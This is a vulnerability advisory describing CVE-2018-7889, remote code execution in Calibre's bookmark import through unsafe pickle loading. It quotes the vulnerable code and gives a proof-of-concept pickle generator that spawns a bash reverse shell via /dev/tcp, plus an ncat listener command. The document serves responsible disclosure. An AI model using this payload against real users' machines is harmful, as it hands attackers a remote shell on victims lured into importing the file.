A malicious pickle file can be used to trigger remote code execution in Calibre E-book Manager.
This vulnerability affects all operating systems Calibre supports and is present in the latest version (3.18) of the application.
Calibre E-book Manager uses the Python
pickle module for serialization in
multiple places. This is a dangerous pattern because the deserialization of
malicious pickle data can result in the execution of arbitrary Python code.
There is one specific functionality in Calibre where the use of pickle can be leveraged by an attacker to obtain code execution by social engineering a target.
Calibre allows users to export and import bookmark data from a
src/calibre/gui2/viewer/bookmarkmanager.py contains code that
imports a previously exported file containing bookmark information. This file
data is directly passed into
206 files = choose_files(self, 'export-viewer-bookmarks', _('Import bookmarks'), 207 filters=[(_('Saved bookmarks'), ['pickle'])], all_files=False, select_only_single_file=True) 208 if not files: 209 return 210 filename = files 211 212 imported = None 213 with open(filename, 'rb') as fileobj: 214 imported = cPickle.load(fileobj)
Proof of Concept
For the proof of concept, we will use a malicious pickle generated by the below
import cPickle import os import base64 import pickletools class Exploit(object): def __reduce__(self): return (os.system, (("bash -i >& /dev/tcp/127.0.0.1/8000 0>&1"),)) with open("exploit.pickle", "wb") as f: cPickle.dump(Exploit(), f, cPickle.HIGHEST_PROTOCOL)
The exploit will make a reverse shell to a listener on 127.0.0.1:8000, so we
set that up using
$ ncat -nlvp 8000 Ncat: Version 7.60 ( https://nmap.org/ncat ) Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one. Ncat: SHA-1 fingerprint: 125E F683 5DA6 153A 6E26 E957 0C92 4706 2596 347C Ncat: Listening on :::8000 Ncat: Listening on 0.0.0.0:8000
We open an ebook and navigate to the "Bookmarks" icon on the left of the
screen and click the "Show/hide bookmarks" menu item. We then click the
"Import" button on the bookmarks pane and select the generated
file. This should trigger a reverse shell on our listener.
This issue was discovered by Ayrx.
- 02 Mar 2018 - Vulnerability discovered.
- 07 Mar 2018 - Vulnerability reported to the vendor.
- 07 Mar 2018 - Vulnerability fixed by vendor in commit
- 09 Mar 2018 - CVE-2018-7889 assigned.